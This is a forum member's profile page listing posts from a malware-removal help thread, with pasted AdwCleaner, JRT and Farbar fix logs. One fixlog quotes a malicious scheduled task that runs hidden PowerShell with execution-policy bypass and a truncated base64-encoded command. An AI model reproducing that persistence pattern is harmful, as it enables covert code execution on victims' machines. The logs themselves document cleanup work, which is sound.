Jump to content

Irvineboy

Members
  • Posts

    19
  • Joined

  • Last visited

Reputation

0 Neutral

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Maybe on the trial free version, even when you click on "scan for rootkit" it does not work?
  2. Is the Malwarebytes Anti-Rootkit something we can scan regularly like the Anti-Maleware program? In the Anti-Maleware program, there is an option to turn on the "scan for rootkit". So shouldn't that take care of it during the scans?
  3. So why doesn't Malewarebytes combine the 3 products into one?
  4. here are the results of the Fixlog.txt from FRST64 Fixlog.txt
  5. Here is the ESET log ESET log.txt What is interesting is that ESET actually found 23, not 13, infected files. Malewarebytes Anti-Maleware + AdwCleaner + JRT did not find. 3 programs
  6. Ron, Here are the results of the FRST64 scan. The FRST.txt file does not show anything but the addition.txt does Also Marewarebytes threat scan log. FRST.txt Addition.txt MB.txt
  7. Ron, I'm not having issues running Malewarebytes. I have run it with the latest version with your link above. Someone told me to rescan with something called ESET Online Scanner website It's catching 13 infected files that Malewarebytes Anti-Maleware, AdwCleaner and JRT did not catch.
  8. OK I finally got Malewarebytes Anti-Maleware to work in Safe Mode. I just reran Malewarebytes Anti-Maleware. It found 936 threats and I quarantined all 936 threats.I also scan AdwCleaner by Malewarebytes and removed 29 threats. I will post log below.I also ran JRT but the system restore failed. I will post log belowI did this a few days ago and the virus was supposedly gone. But then computer restarted out of the nowhere by itself and went to bluescreen and everything bad occurred again. Almost seems like the trojan went dormant when the scans were being done, it showed virus free, then came back. AdwCleaner Log is here # AdwCleaner v6.045 - Logfile created 30/03/2017 at 06:59:24# Updated on 28/03/2017 by Malwarebytes# Database : 2017-03-28.2 [Local]# Operating System : Windows 7 Home Premium Service Pack 1 (X64)# Username : Jason - JASON-PC# Running from : C:\Users\Jason\Desktop\Malewarbytes\adwcleaner_6.045.exe# Mode: Clean# Support : https://www.malwarebytes.com/support ***** [ Services ] ***** ***** [ Folders ] ***** [-] Folder deleted: C:\Users\Public\Documents\Guid[-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Itibiti[-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tlerauic[-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WikiThemes[-] Folder deleted: C:\Windows\SysWOW64\sstmp ***** [ Files ] ***** [-] File deleted: C:\TOSTACK[-] File deleted: C:\Windows\SysWOW64\delay.dat ***** [ DLL ] ***** ***** [ WMI ] ***** ***** [ Shortcuts ] ***** ***** [ Scheduled Tasks ] ***** [-] Task deleted: Lmeried ***** [ Registry ] ***** [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}[-] Key deleted: HKU\.DEFAULT\Software\AppDataLow\Software\WikiThemes[#] Key deleted on reboot: HKU\S-1-5-18\Software\AppDataLow\Software\WikiThemes[-] Key deleted: HKLM\SOFTWARE\SearchModule[-] Key deleted: HKLM\SOFTWARE\msServer[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{730E03E4-350E-48E5-9D3E-4329903D454D}[-] Key deleted: [x64] HKLM\SOFTWARE\SearchModule[-] Key deleted: [x64] HKLM\SOFTWARE\HDWallpaper[-] Key deleted: [x64] HKLM\SOFTWARE\DtsEncodeTools[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\22dab7df1273e6748e51e8e147fdb2dc[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\22dab7df1273e6748e51e8e147fdb2dc[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1} ***** [ Web browsers ] ***** ************************* :: "Tracing" keys deleted:: Winsock settings cleared ************************* C:\AdwCleaner\AdwCleaner[C0].txt - [13986 Bytes] - [28/03/2017 14:08:30]C:\AdwCleaner\AdwCleaner[C2].txt - [3290 Bytes] - [30/03/2017 06:59:24]C:\AdwCleaner\AdwCleaner[S0].txt - [14882 Bytes] - [27/03/2017 13:10:07]C:\AdwCleaner\AdwCleaner[S1].txt - [12735 Bytes] - [28/03/2017 13:18:40]C:\AdwCleaner\AdwCleaner[S2].txt - [12622 Bytes] - [28/03/2017 14:00:05]C:\AdwCleaner\AdwCleaner[S3].txt - [1458 Bytes] - [28/03/2017 17:50:43]C:\AdwCleaner\AdwCleaner[S4].txt - [3698 Bytes] - [30/03/2017 06:59:10] ########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [3731 Bytes] ########## JRT Log here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Junkware Removal Tool (JRT) by MalwarebytesVersion: 8.1.2 (03.10.2017)Operating System: Windows 7 Home Premium x64 Ran by Jason (Administrator) on Thu 03/30/2017 at 7:16:51.30~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 9 Successfully deleted: C:\Windows\wininit.ini (File) Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3U4MKWUY (Temporary Internet Files Folder) Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I82QPFC5 (Temporary Internet Files Folder) Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RWUNYEY3 (Temporary Internet Files Folder) Successfully deleted: C:\Users\Jason\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W4H4K7UF (Temporary Internet Files Folder) Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3U4MKWUY (Temporary Internet Files Folder) Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I82QPFC5 (Temporary Internet Files Folder) Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RWUNYEY3 (Temporary Internet Files Folder) Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W4H4K7UF (Temporary Internet Files Folder) Registry: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Scan was completed on Thu 03/30/2017 at 7:17:48.33End of JRT log~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9. One more to add - the above happened AFTER I ran the Malewarebytes Anti-Rootkit Supplement Even after I restarted the computer, I went back to the MBAR folder, click on Plugins folder, and then on FixDamage.exe.
  10. That link has the exact version I had originally installed. Problem is, the virus won't let me open Malewarebytes AntiVirus. Even if Safe Mode. It says when I click on it "The requested resource is in use"
  11. I thought I had is the version 3.0.6 I originally had and installed and scanned to get rid of the virus before it got reinfected. Because it said my version was latest update. I worry it goes dormant so it looks like the scan worked and comes back
  12. Here are results of the fixlog. I still have a few applications that I don't know that are showing up on my desktop and my start menu. Launch System Healer and Launch One System Care. They don't show up in the "uninstall program" for some reason. When I open a browser, I get www-searching.com which is a virus. Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017 Ran by Jason (29-03-2017 21:14:42) Run:3 Running from C:\Users\Jason\Desktop Loaded Profiles: Jason (Available Profiles: Jason) Boot Mode: Safe Mode (with Networking) ============================================== fixlist content: ***************** Task: {033D8299-43DA-4642-A0E5-772C2F1E18BF} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION Task: {3EE4AF6F-AB24-41C6-9D74-341D0F95EA1A} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION Task: {59D662DB-18C6-48A4-AB18-363E41960B8B} - System32\Tasks\{7D0B0B47-090F-7A04-0E11-087F0A7A1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwAgACAAOwAgACAAOwA7ADsAIAAgADsAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIA (the data entry has 9964 more characters). <==== ATTENTION Task: {CDBE9FA4-A2EE-4FE6-BB0D-A2588AD89A8B} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION Task: {D259DB4A-5842-489A-B975-8790C69A5ED3} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION Task: {FB2DA1EB-6B73-4959-88B0-E758093EFFAA} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION HKLM-x32\...\Run: [AnonymizerGadget] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe [349704 2017-03-29] (Jetico ltd) <===== ATTENTION HKLM-x32\...\Run: [AppTrailers] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers\AppTrailers.exe [47835928 2017-03-10] () <===== ATTENTION HKLM-x32\...\Run: [WikiThemes] => C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes\WikiThemes.exe [47852648 2017-03-10] () <===== ATTENTION HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Windows\TEMP\IXP000.TMP\" <===== ATTENTION HKU\S-1-5-18\...\Run: [Itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe [7342080 2013-06-26] () <===== ATTENTION S2 5c94f427ca6a541e75713ba5123bd6b4; C:\Program Files\5c94f427ca6a541e75713ba5123bd6b4\f107708187d152b4ed103032f0a278ba.exe [14661120 2017-03-24] () [File not signed] <==== ATTENTION S2 Dataup; C:\Program Files (x86)\ntuserlitelist\dataup\dataup.exe [77824 2017-01-05] () [File not signed] <==== ATTENTION S2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [2989056 2017-03-29] (Search Module Ltd.) [File not signed] <==== ATTENTION S2 TheScreenshotProService; C:\Program Files (x86)\ScreenshotPro\1.0.0.6000090\ScreenshotProServ.exe [152688 2017-01-11] () <==== ATTENTION S2 windowsmanagementservice; C:\Windows\SysWOW64\config\systemprofile\AppData\Local\azjcrvpw\ct.exe [947200 2017-03-29] () [File not signed] <==== ATTENTION R0 drmkpro64; C:\Windows\System32\drivers\ndistpr64.sys [78112 2013-09-28] () [File not signed] <==== ATTENTION HKU\S-1-5-18\...\Run: [Spoutly.exe] => C:\Program Files (x86)\Spoutly\SpoutlyLauncher.exe HKU\S-1-5-18\...\Run: [Itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe [7342080 2013-06-26] () <===== ATTENTION HKU\S-1-5-18\...\Run: [1L2OBBN7P3] => C:\Program Files\XH54S4PPV7\IQMRG187L.exe [1065984 2017-03-29] (00P5M6RS) HKU\S-1-5-18\...\Run: [IT3HV1YGYE] => C:\Program Files\PCX8PI5E2E\PCX8PI5E2.exe [1065984 2017-03-29] (00P5M6RS) HKU\S-1-5-18\...\Run: [9y7HKMIExV.exe] => C:\Program Files\XH54S4PPV7\Q8VWXWTQ2D1BYWBKH079J8G3DHFZZMSZ9ABQV2L2W\9y7HKMIExV.exe [168448 2017-03-29] (tachba3) HKU\S-1-5-18\...\Run: [VQVQ7492KB] => C:\Program Files\5VU8BUUF37\9GKARZYLQ.exe [1065984 2017-03-29] (00P5M6RS) R1 ebcb96f81037be9a3e0ca90a17dbc11c; C:\Windows\system32\drivers\ebcb96f81037be9a3e0ca90a17dbc11c.sys [8501584 2017-03-24] (MPDV6U) <==== ATTENTION R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-03-29] () <==== ATTENTION FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] FF Plugin HKU\S-1-5-21-616515737-2173210804-205294457-1001: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Jason\AppData\Roaming\ACEStream\player\npace_plugin.dll [No File] C:\Users\Jason\AppData\Roaming\ACEStream C:\Windows\system32\drivers\NetUtils2016.sys C:\Windows\SysWOW64\config\systemprofile\AppData\Local\azjcrvpw C:\Program Files (x86)\ntuserlitelist\dataup C:\Windows\system32\drivers\ebcb96f81037be9a3e0ca90a17dbc11c.sys C:\Program Files\5c94f427ca6a541e75713ba5123bd6b4 C:\Program Files (x86)\Itibiti Soft Phone C:\Program Files (x86)\ScreenshotPro C:\Program Files\Common Files\Noobzo C:\Program Files (x86)\OneSystemCare C:\Program Files (x86)\Spoutly C:\Program Files\XH54S4PPV7 C:\Windows\TEMP\IXP000.TMP C:\Program Files (x86)\SystemHealer C:\Program Files\5VU8BUUF37 C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe 2017-03-28 13:13 - 2017-03-28 17:37 - 0000380 _____ () C:\Users\Jason\AppData\Roaming\sp_data.sys 2017-03-28 13:13 - 2017-03-29 08:46 - 0000440 _____ () C:\ProgramData\lxebscan.log 2017-03-28 13:15 - 2017-03-28 13:15 - 0000159 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc 2017-03-29 08:31 - 2017-03-29 08:31 - 0327680 _____ () C:\ProgramData\smp2.exe C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers\AppTrailers.exe C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes\WikiThemes.exe C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe C:\ProgramData\smp2.exe S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [21984 2016-03-09] () C:\Windows\system32\drivers\semav6msr64.sys S2 zigipyro; C:\Windows\SysWOW64\config\systemprofile\AppData\Local\1887E880-1490776169-81E1-2282-10BF48240C88\qnsuCB40.tmp [158720 2015-12-26] () [File not signed] S2 gemeloki; C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195\protf6ed071c-ac2e-489b-914e-97afa5bc5edd.tmpfs [X] S2 servervo; C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195\knsf6ed071c-ac2e-489b-914e-97afa5bc5edd.tmpfs [X] C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195 C:\Windows\SysWOW64\config\systemprofile\AppData\Local\1887E880-1490776169-81E1-2282-10BF48240C88 CMD: bcdedit.exe /set {bootmgr} displaybootmenu Yes CMD: bcdedit.exe /set {current} bootstatuspolicy DisplayAllFailures CMD: bcdedit.exe /set {current} recoveryenabled Yes CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: ipconfig /flushdns CMD: netsh winsock reset catalog CMD: netsh int ip reset C:\resettcpip.txt CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" CMD: Bitsadmin /Reset /Allusers EMPTYTEMP: Reboot: ***************** HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{033D8299-43DA-4642-A0E5-772C2F1E18BF} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{033D8299-43DA-4642-A0E5-772C2F1E18BF} => key removed successfully C:\Windows\System32\Tasks\One System CarePeriod => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System CarePeriod => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3EE4AF6F-AB24-41C6-9D74-341D0F95EA1A} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3EE4AF6F-AB24-41C6-9D74-341D0F95EA1A} => key removed successfully C:\Windows\System32\Tasks\One System Care Task => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{59D662DB-18C6-48A4-AB18-363E41960B8B} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{59D662DB-18C6-48A4-AB18-363E41960B8B} => key removed successfully C:\Windows\System32\Tasks\{7D0B0B47-090F-7A04-0E11-087F0A7A1179} => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D0B0B47-090F-7A04-0E11-087F0A7A1179} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDBE9FA4-A2EE-4FE6-BB0D-A2588AD89A8B} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDBE9FA4-A2EE-4FE6-BB0D-A2588AD89A8B} => key removed successfully C:\Windows\System32\Tasks\System Healer Task => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System Healer Task => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D259DB4A-5842-489A-B975-8790C69A5ED3} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D259DB4A-5842-489A-B975-8790C69A5ED3} => key removed successfully C:\Windows\System32\Tasks\System HealerPeriod => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerPeriod => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB2DA1EB-6B73-4959-88B0-E758093EFFAA} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB2DA1EB-6B73-4959-88B0-E758093EFFAA} => key removed successfully C:\Windows\System32\Tasks\System HealerStartUp => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerStartUp => key removed successfully C:\Windows\Tasks\One System CarePeriod.job => moved successfully C:\Windows\Tasks\System HealerPeriod.job => moved successfully C:\Windows\Tasks\System HealerStartUp.job => moved successfully HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\AnonymizerGadget => value removed successfully HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\AppTrailers => value not found. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\WikiThemes => value not found. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup0 => value not found. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Itibiti.exe => value removed successfully HKLM\System\CurrentControlSet\Services\5c94f427ca6a541e75713ba5123bd6b4 => key removed successfully 5c94f427ca6a541e75713ba5123bd6b4 => service removed successfully Dataup => service not found. HKLM\System\CurrentControlSet\Services\SMUpd => key removed successfully SMUpd => service removed successfully HKLM\System\CurrentControlSet\Services\TheScreenshotProService => key removed successfully TheScreenshotProService => service removed successfully HKLM\System\CurrentControlSet\Services\windowsmanagementservice => key removed successfully windowsmanagementservice => service removed successfully drmkpro64 => service not found. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Spoutly.exe => value removed successfully HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Itibiti.exe => value not found. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\1L2OBBN7P3 => value not found. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\IT3HV1YGYE => value not found. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\9y7HKMIExV.exe => value not found. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\VQVQ7492KB => value not found. HKLM\System\CurrentControlSet\Services\ebcb96f81037be9a3e0ca90a17dbc11c => key removed successfully ebcb96f81037be9a3e0ca90a17dbc11c => service removed successfully HKLM\System\CurrentControlSet\Services\NetUtils2016 => key removed successfully NetUtils2016 => service removed successfully HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully HKU\S-1-5-21-616515737-2173210804-205294457-1001\Software\MozillaPlugins\@acestream.net/acestreamplugin,version=3.1.6 => key removed successfully C:\Users\Jason\AppData\Roaming\ACEStream\player\npace_plugin.dll => not found. "C:\Users\Jason\AppData\Roaming\ACEStream" => not found. "C:\Windows\system32\drivers\NetUtils2016.sys" => not found. C:\Windows\SysWOW64\config\systemprofile\AppData\Local\azjcrvpw => moved successfully C:\Program Files (x86)\ntuserlitelist\dataup => moved successfully "C:\Windows\system32\drivers\ebcb96f81037be9a3e0ca90a17dbc11c.sys" => not found. C:\Program Files\5c94f427ca6a541e75713ba5123bd6b4 => moved successfully "C:\Program Files (x86)\Itibiti Soft Phone" => not found. C:\Program Files (x86)\ScreenshotPro => moved successfully C:\Program Files\Common Files\Noobzo => moved successfully "C:\Program Files (x86)\OneSystemCare" => not found. "C:\Program Files (x86)\Spoutly" => not found. C:\Program Files\XH54S4PPV7 => moved successfully "C:\Windows\TEMP\IXP000.TMP" => not found. "C:\Program Files (x86)\SystemHealer" => not found. C:\Program Files\5VU8BUUF37 => moved successfully "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes" => not found. "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers" => not found. C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe => moved successfully C:\Users\Jason\AppData\Roaming\sp_data.sys => moved successfully C:\ProgramData\lxebscan.log => moved successfully C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc => moved successfully C:\ProgramData\smp2.exe => moved successfully "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe" => not found. "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AppTrailers\AppTrailers.exe" => not found. "C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WikiThemes\WikiThemes.exe" => not found. "C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe" => not found. "C:\ProgramData\smp2.exe" => not found. HKLM\System\CurrentControlSet\Services\semav6msr64 => key removed successfully semav6msr64 => service removed successfully C:\Windows\system32\drivers\semav6msr64.sys => moved successfully zigipyro => service not found. gemeloki => service not found. servervo => service not found. C:\Program Files (x86)\f6ed071c-ac2e-489b-914e-97afa5bc5edd1490801195 => moved successfully "C:\Windows\SysWOW64\config\systemprofile\AppData\Local\1887E880-1490776169-81E1-2282-10BF48240C88" => not found. ========= bcdedit.exe /set {bootmgr} displaybootmenu Yes ========= The operation completed successfully. ========= End of CMD: ========= ========= bcdedit.exe /set {current} bootstatuspolicy DisplayAllFailures ========= The operation completed successfully. ========= End of CMD: ========= ========= bcdedit.exe /set {current} recoveryenabled Yes ========= The operation completed successfully. ========= End of CMD: ========= ========= netsh advfirewall reset ========= Ok. ========= End of CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= Ok. ========= End of CMD: ========= ========= ipconfig /flushdns ========= Windows IP Configuration Successfully flushed the DNS Resolver Cache. ========= End of CMD: ========= ========= netsh winsock reset catalog ========= Sucessfully reset the Winsock Catalog. You must restart the computer in order to complete the reset. ========= End of CMD: ========= ========= netsh int ip reset C:\resettcpip.txt ========= Reseting Global, OK! Reseting Interface, OK! Restart the computer to complete this action. ========= End of CMD: ========= ========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" ========= Failed to clear log AirSpaceChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation. ========= End of CMD: ========= ========= Bitsadmin /Reset /Allusers ========= BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. Unable to connect to BITS - 0x8007042c The dependency service or group failed to start. ========= End of CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 4194304 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13649096 B Java, Flash, Steam htmlcache => 0 B Windows/system/drivers => 170598154 B Edge => 0 B Chrome => 28337511 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 128 B systemprofile32 => 103299153 B LocalService => 0 B NetworkService => 5010 B Jason => 11052526 B RecycleBin => 6324502 B EmptyTemp: => 321.8 MB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 21:16:13 ====
  13. I thought all three tools removed the virus. However, the virus came back so I posted the scan results and now am not sure what to do. It seems like the virus goes dormant and then reappears. Frustrating.
  14. Two attachments here. FRST.txt Addition.txt
  15. I ended up using the Maleware Rootkit and that got rid of the virus after scanning it a few times, the virus was gone. But today, the virus came back! My computer automatically restarted and upon loading desktop, there were a bunch of unwanted applications like Launch System Healer and Video Abductor and KNCTR. Then it started blue screen again and won't let me load Windows in Normal Mode. Again, it won't let me launch Malewarebytes either "The requested resource is in use". Stubborn virus.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.